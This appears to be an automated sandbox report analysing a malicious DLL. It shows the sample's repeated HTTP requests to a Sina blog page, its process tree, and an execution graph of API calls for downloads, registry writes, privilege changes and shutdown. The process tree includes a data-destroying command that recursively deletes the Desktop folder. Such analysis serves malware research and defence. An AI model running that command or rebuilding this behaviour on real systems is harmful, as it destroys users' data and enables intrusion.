                                                                                                                                                                        2024-12-19 14:44:49 UTC5260INData Raw: 69 64 3d 22 63 6f 6d 70 5f 39 30 31 5f 73 63 6f 72 65 22 3e 3c 73 74 72 6f 6e 67 3e 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 69 6e 66 6f 5f 6c 69 73 74 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 53 47 5f 74 78 74 63 22 3e e5 8d 9a e5 ae a2 e8 ae bf e9 97 ae ef bc 9a 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 69 64 3d 22 63 6f 6d 70 5f 39 30 31 5f 70 76 22 3e 3c 73 74 72 6f 6e 67 3e 33 34 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: id="comp_901_score"><strong>0</strong></span></li> </ul> <ul class="info_list2"> <li><span class="SG_txtc"></span><span id="comp_901_pv"><strong>345</strong></span></li>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.11  49749        116.133.8.92    443               1232  C:\Windows\SysWOW64\rundll32.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-19 14:45:03 UTC  142                OUT        GET /u/5762479093 HTTP/1.1
                                                       User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                       Host: blog.sina.com.cn
                                                       Connection: Keep-Alive


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.11  49757        116.133.8.92    443               1232  C:\Windows\SysWOW64\rundll32.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-19 14:45:11 UTC  142                OUT        GET /u/5762479093 HTTP/1.1
                                                       User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                       Host: blog.sina.com.cn
                                                       Connection: Keep-Alive


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.11  49782        116.133.8.92    443               1232  C:\Windows\SysWOW64\rundll32.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-19 14:45:36 UTC  142                OUT        GET /u/5762479093 HTTP/1.1
                                                       User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                       Host: blog.sina.com.cn
                                                       Connection: Keep-Alive


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.11  49786        116.133.8.92    443               1232  C:\Windows\SysWOW64\rundll32.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-19 14:45:40 UTC  142                OUT        GET /u/5762479093 HTTP/1.1
                                                       User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                       Host: blog.sina.com.cn
                                                       Connection: Keep-Alive


                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll"
                                                                                                                                                                        Imagebase:0x2a0000
                                                                                                                                                                        File size:126'464 bytes
                                                                                                                                                                        MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:2
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff68cce0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:3
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1
                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,ClassObject
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:6
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:09:44:07
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff68cce0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:8
Start time: 09:44:07
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 3
Imagebase: 0xa50000
File size: 18'944 bytes
MD5 hash: B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 09:44:10
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,InputFile
Imagebase: 0xbd0000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 09:44:13
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,PrintFile
Imagebase: 0xbd0000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 14
Start time: 09:44:13
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 672
Imagebase: 0xe90000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 09:44:16
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
Imagebase: 0xbd0000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 09:44:16
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",InputFile
Imagebase: 0xbd0000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 09:44:16
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",PrintFile
Imagebase: 0xbd0000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 09:44:16
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Imagebase: 0xc30000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 09:44:16
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff68cce0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 09:44:16
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 672
Imagebase: 0xe90000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 09:44:16
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 3
Imagebase: 0xa50000
File size: 18'944 bytes
MD5 hash: B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 09:44:44
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
Imagebase: 0xbd0000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 09:44:45
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Imagebase: 0xc30000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 09:44:45
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff68cce0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                        Target ID:29
                                                                                                                                                                        Start time:09:44:45
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:32
                                                                                                                                                                        Start time:09:44:53
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:33
                                                                                                                                                                        Start time:09:44:53
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:34
                                                                                                                                                                        Start time:09:44:53
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff68cce0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:35
                                                                                                                                                                        Start time:09:44:53
                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true


Execution Graph

Execution Coverage:3.9%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:0.8%
Total number of Nodes:360
Total number of Limit Nodes:22
                                                                                                                                                                          execution_graph 29727 10006f01 29728 10006f0e 29727->29728 29747 10001000 29728->29747 29730 10006f1b 29731 10001000 6 API calls 29730->29731 29733 10006f29 29731->29733 29732 1000592e lstrcmpiA CloseHandle CreateToolhelp32Snapshot Process32First Process32Next 29732->29733 29733->29732 29734 10006f42 Sleep 29733->29734 29735 10006f4f 29733->29735 29734->29733 29736 10001000 6 API calls 29735->29736 29737 10006fa6 29736->29737 29738 10001000 6 API calls 29737->29738 29745 10006fbd 29738->29745 29743 10007076 Sleep 29743->29745 29744 100070b5 wsprintfA 29744->29745 29745->29743 29745->29744 29746 100070eb PrintFile PrintFile 29745->29746 29751 10005c5e 29745->29751 29766 10003ef4 29745->29766 29769 100061cf 29745->29769 29789 10004139 29745->29789 29746->29745 29748 100016c0 29747->29748 29793 10021753 29748->29793 29750 10001804 ctype 29750->29730 29752 10003ef4 wvsprintfA 29751->29752 29753 10005c98 29752->29753 29798 10003f72 PathFileExistsA 29753->29798 29755 10005ca4 29756 10005cab 29755->29756 29757 10005caf 29755->29757 29756->29745 29799 10004015 CreateFileA 29757->29799 29759 10005ccd 29759->29756 29800 10004035 ReadFile 29759->29800 29761 10005ce8 29801 10003f92 CloseHandle 29761->29801 29763 10005cee 29802 10003f7d StrStrIA 29763->29802 29765 10005cfb 29765->29756 29803 10003ee1 wvsprintfA 29766->29803 29768 10003f06 29768->29745 29770 10001000 6 API calls 29769->29770 29771 100061ef 29770->29771 29804 10003f0a InternetOpenA 29771->29804 29773 100061f6 29783 10006200 29773->29783 29805 10003f24 InternetOpenUrlA 29773->29805 29775 10006218 29776 10006222 29775->29776 29777 1000622b 29775->29777 29806 10003f58 InternetCloseHandle 29776->29806 29779 10006288 29777->29779 29786 1000627e 29777->29786 29807 10003f41 InternetReadFile 29777->29807 29808 1000cd60 7 API calls 29777->29808 29810 
10003f58 InternetCloseHandle 29779->29810 29781 10006228 29811 10003f58 InternetCloseHandle 29781->29811 29783->29745 29809 10003f92 CloseHandle 29786->29809 29788 10006286 29788->29779 29791 10004146 29789->29791 29790 1000429c 29790->29745 29791->29790 29812 10028ac7 6 API calls 29791->29812 29794 10021758 29793->29794 29797 1002f839 6 API calls 29794->29797 29798->29755 29799->29759 29800->29761 29801->29763 29802->29765 29803->29768 29804->29773 29805->29775 29806->29781 29807->29777 29809->29788 29810->29781 29811->29783 29813 10006b42 29814 10006b60 29813->29814 29821 10003ece CreateMutexA 29814->29821 29816 10006b73 GetLastError 29817 10006b84 CreateThread 29816->29817 29819 10006bb3 29816->29819 29818 10006b9e 29817->29818 29822 10006890 29817->29822 29820 10006ba6 Sleep 29818->29820 29820->29817 29821->29816 29823 100062f3 12 API calls 29822->29823 29825 10006888 29822->29825 29823->29825 29827 10006905 29825->29827 29828 100062f3 29825->29828 29847 10005dc6 29825->29847 29829 10006326 29828->29829 29831 1000643c 29829->29831 29868 1001f2aa 6 API calls ctype 29829->29868 29861 10005858 29831->29861 29842 10006483 29842->29825 29848 10005df7 29847->29848 29853 10005e30 29848->29853 29879 1000409d RegQueryValueExA 29848->29879 29850 10005e28 29903 10004092 RegCloseKey 29850->29903 29880 100058b6 29853->29880 29854 10005e5b 29855 10003ef4 wvsprintfA 29854->29855 29856 10005e9b 29855->29856 29886 10005d09 29856->29886 29859 10003ef4 wvsprintfA 29860 10005ef3 29859->29860 29860->29825 29862 1000585f 29861->29862 29864 10005874 29862->29864 29869 10003eb4 gethostbyname 29862->29869 29865 10030f53 29864->29865 29870 1003464a 29865->29870 29867 10030f59 29867->29842 29869->29864 29871 10034659 29870->29871 29874 1002f9b4 29870->29874 29872 10034662 29871->29872 29878 10025ad9 6 API calls ctype 29871->29878 29872->29867 29876 100292fd 29874->29876 29877 1001ecb2 6 API calls 29874->29877 29876->29867 29878->29872 29879->29850 29881 1000592a 29880->29881 29882 
100058c6 29880->29882 29881->29854 29882->29881 29883 10005989 29882->29883 29904 10003f92 CloseHandle 29883->29904 29885 10005991 29885->29854 29887 10003ef4 wvsprintfA 29886->29887 29888 10005d43 29887->29888 29905 10003f72 PathFileExistsA 29888->29905 29890 10005d4f 29891 10005d56 29890->29891 29892 10005d5a 29890->29892 29891->29859 29891->29860 29906 10004015 CreateFileA 29892->29906 29894 10005d78 29894->29891 29907 10004035 ReadFile 29894->29907 29896 10005d93 29908 10003f92 CloseHandle 29896->29908 29898 10005d99 29909 10003f7d StrStrIA 29898->29909 29900 10005da6 29900->29891 29910 10003f7d StrStrIA 29900->29910 29902 10005dba 29902->29891 29903->29853 29904->29885 29905->29890 29906->29894 29907->29896 29908->29898 29909->29900 29910->29902 30113 10002523 30114 10002528 30113->30114 30115 10001000 6 API calls 30114->30115 30116 10002532 30115->30116 30119 10024275 30116->30119 30120 10024294 30119->30120 30123 1003b76d 30120->30123 30122 100242b0 30125 1002c21b 9 API calls 30123->30125 30126 10007124 30131 1000713b 30126->30131 30127 10005c5e 6 API calls 30127->30131 30128 10003ef4 wvsprintfA 30128->30131 30129 100061cf 9 API calls 30129->30131 30130 100071c9 Sleep 30130->30131 30131->30127 30131->30128 30131->30129 30131->30130 30132 1000721a wsprintfA 30131->30132 30132->30131 30133 1000d269 30136 1000d2b2 30133->30136 30135 1000d271 ctype 30137 1000d2c2 30136->30137 30138 1000d2d6 30137->30138 30140 1001e0d0 30137->30140 30138->30135 30141 1001e0ea 30140->30141 30147 1001e101 ctype 30140->30147 30142 1001e0f7 30141->30142 30143 1001f2a4 ctype 30141->30143 30148 1001d665 30142->30148 30152 10024179 6 API calls 30143->30152 30149 1001d66a ctype 30148->30149 30153 1001d4bf 8 API calls ctype 30149->30153 30151 100230ad 30153->30151 29919 1000858a Sleep 29920 10001000 6 API calls 29919->29920 29921 100085ad 29919->29921 29920->29921 29922 100061cf 9 API calls 29921->29922 29923 100085d4 29922->29923 29924 100085e6 29923->29924 29925 100085dd Sleep 
29923->29925 29926 10008602 wsprintfA 29924->29926 29925->29925 29929 10006852 19 API calls 29926->29929 29928 10008625 29929->29928 30154 10001fab 30155 10001fb0 30154->30155 30156 10001000 6 API calls 30155->30156 30157 10001fba 30156->30157 30160 10024849 30157->30160 30159 10001fc7 30160->30159 30161 1002728e 30160->30161 30162 100272cb CreateThread 30161->30162 30164 1001da36 30162->30164 29930 1000828f 29931 100082ca 29930->29931 29932 10001000 6 API calls 29931->29932 29933 100082f2 29932->29933 29934 10001000 6 API calls 29933->29934 29940 10008309 29934->29940 29935 10005c5e 6 API calls 29935->29940 29936 10003ef4 wvsprintfA 29936->29940 29937 100061cf 9 API calls 29937->29940 29938 100083b1 Sleep 29938->29940 29940->29935 29940->29936 29940->29937 29940->29938 29941 10008402 wsprintfA 29940->29941 29942 10001000 6 API calls 29940->29942 29943 10007231 15 API calls 29940->29943 29941->29940 29942->29940 29943->29940 29944 10025852 29947 10006de7 29944->29947 29946 100251a7 29948 10006df1 29947->29948 29949 10003ef4 wvsprintfA 29948->29949 29950 10006eb2 29949->29950 29959 10006c8c 29950->29959 29952 10006ebe 29953 10001000 6 API calls 29952->29953 29954 10006ecd 29953->29954 29955 10003ef4 wvsprintfA 29954->29955 29956 10006edb 29955->29956 29963 100062a2 29956->29963 29960 10006c99 29959->29960 29974 10006bbf 29960->29974 29962 10006ca6 29962->29952 29964 10001000 6 API calls 29963->29964 29965 100062b4 29964->29965 29982 10003f0a InternetOpenA 29965->29982 29967 100062bb 29968 100062ec 29967->29968 29983 10003f24 InternetOpenUrlA 29967->29983 29968->29946 29970 100062d6 29984 10003f58 InternetCloseHandle 29970->29984 29972 100062e6 29985 10003f58 InternetCloseHandle 29972->29985 29977 10035172 29974->29977 29976 10006bdb 29976->29962 29978 100312a2 29977->29978 29980 10035188 29978->29980 29981 1002f279 6 API calls 29978->29981 29980->29980 29981->29977 29982->29967 29983->29970 29984->29972 29985->29968 30169 10036673 30171 1002461f 30169->30171 30172 
1002462c 30171->30172 30174 10031d45 30172->30174 30175 10031d55 30174->30175 30180 1002829b 30174->30180 30176 10031d5b 30175->30176 30183 100282f4 30175->30183 30178 10004494 7 API calls 30176->30178 30179 10036d80 30178->30179 30182 1003849b 30180->30182 30185 10023b24 6 API calls 30180->30185 30186 100311ac 30183->30186 30185->30180 30189 1002870d 30186->30189 30192 100044bf 30189->30192 30191 10021b59 30199 10036273 30192->30199 30194 100044db 30195 100044eb GetExtendedUdpTable 30194->30195 30197 10004516 30194->30197 30196 10004501 30195->30196 30196->30197 30198 1000451b GetExtendedUdpTable 30196->30198 30197->30191 30198->30197 30200 1002be70 30199->30200 30200->30199 30201 1003a759 30200->30201 30203 1002d70b 6 API calls 30200->30203 30201->30194 30203->30199 29986 10001812 29987 10001817 29986->29987 29988 10001000 6 API calls 29987->29988 29989 10001821 29988->29989 29990 100025d2 29991 100025d7 29990->29991 29992 10001000 6 API calls 29991->29992 29993 100025e1 29992->29993 29996 10028391 6 API calls 29993->29996 29997 10006915 29998 10006a76 29997->29998 29999 1000691e 29997->29999 29999->29998 30000 10005f27 AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken GetCurrentProcess 29999->30000 30004 10005faa wvsprintfA CloseHandle WriteFile CreateFileA Concurrency::details::platform::__CreateTimerQueueTimer 29999->30004 30005 10003f63 ExitWindowsEx 29999->30005 30006 10030f2d 8 API calls 29999->30006 30000->29999 30004->29999 30005->29999 30007 100087d6 30013 10004494 30007->30013 30010 100087e3 Sleep CreateThread Sleep CreateThread 30011 10008809 Sleep 30010->30011 30019 10006a91 30010->30019 30012 1000880e 30011->30012 30014 10001000 6 API calls 30013->30014 30015 1000449f 30014->30015 30018 100040ba RegOpenKeyExA 30015->30018 30017 100044b6 30017->30010 30017->30011 30018->30017 30020 10006aa5 30019->30020 30028 10003ece CreateMutexA 30020->30028 30022 10006ac6 GetLastError 30023 10006b18 30022->30023 30024 10006ad7 30022->30024 30026 10006b04 
CreateThread 30024->30026 30027 10006afb Sleep 30024->30027 30029 100064ab 30024->30029 30026->30023 30027->30024 30028->30022 30030 100064b5 30029->30030 30031 10001000 6 API calls 30030->30031 30032 100064fb wsprintfA 30031->30032 30033 1000651a 30032->30033 30050 10003f0a InternetOpenA 30033->30050 30035 1000653d 30049 100066c2 30035->30049 30051 10003f24 InternetOpenUrlA 30035->30051 30037 1000655d 30037->30049 30052 1003aa52 30037->30052 30039 1000657a 30057 100208ad 30039->30057 30042 100065d1 MultiByteToWideChar 30044 10006592 ctype 30042->30044 30043 100065e9 MultiByteToWideChar 30043->30044 30044->30042 30044->30043 30045 10006659 30044->30045 30060 10003f41 InternetReadFile 30044->30060 30046 100066f1 wsprintfA 30045->30046 30045->30049 30047 10006707 ctype 30046->30047 30061 1001ff50 30047->30061 30049->30024 30050->30035 30051->30037 30053 1003aa5e 30052->30053 30056 1002829b 30052->30056 30055 1003849b 30055->30039 30056->30039 30056->30055 30065 10023b24 6 API calls 30056->30065 30066 10021597 30057->30066 30059 100208b2 30059->30044 30060->30044 30062 10022bd1 30061->30062 30063 10006de7 6 API calls 30062->30063 30064 10022fb2 30063->30064 30065->30056 30069 1001dfdd 12 API calls 30066->30069 30070 1002b195 30071 10008817 30070->30071 30075 1002b19f 30070->30075 30072 10001000 6 API calls 30071->30072 30073 1000883e wsprintfA 30072->30073 30074 1000885e 30073->30074 30076 10008863 Sleep 30074->30076 30077 10008877 30074->30077 30078 10008876 30076->30078 30078->30077 30204 10006ef9 30207 10006d1a 30204->30207 30219 10003ff7 GetShortPathNameA 30207->30219 30209 10006d55 30210 10001000 6 API calls 30209->30210 30211 10006d77 30210->30211 30220 1000406c RegCreateKeyExA 30211->30220 30213 10006d83 wsprintfA 30214 10006dbd 30213->30214 30221 100040d4 RegSetValueExA 30214->30221 30216 10006dd6 30222 10004092 RegCloseKey 30216->30222 30218 10006de1 30219->30209 30220->30213 30221->30216 30222->30218 30079 1000821a 30080 10008223 30079->30080 30082 10008282 
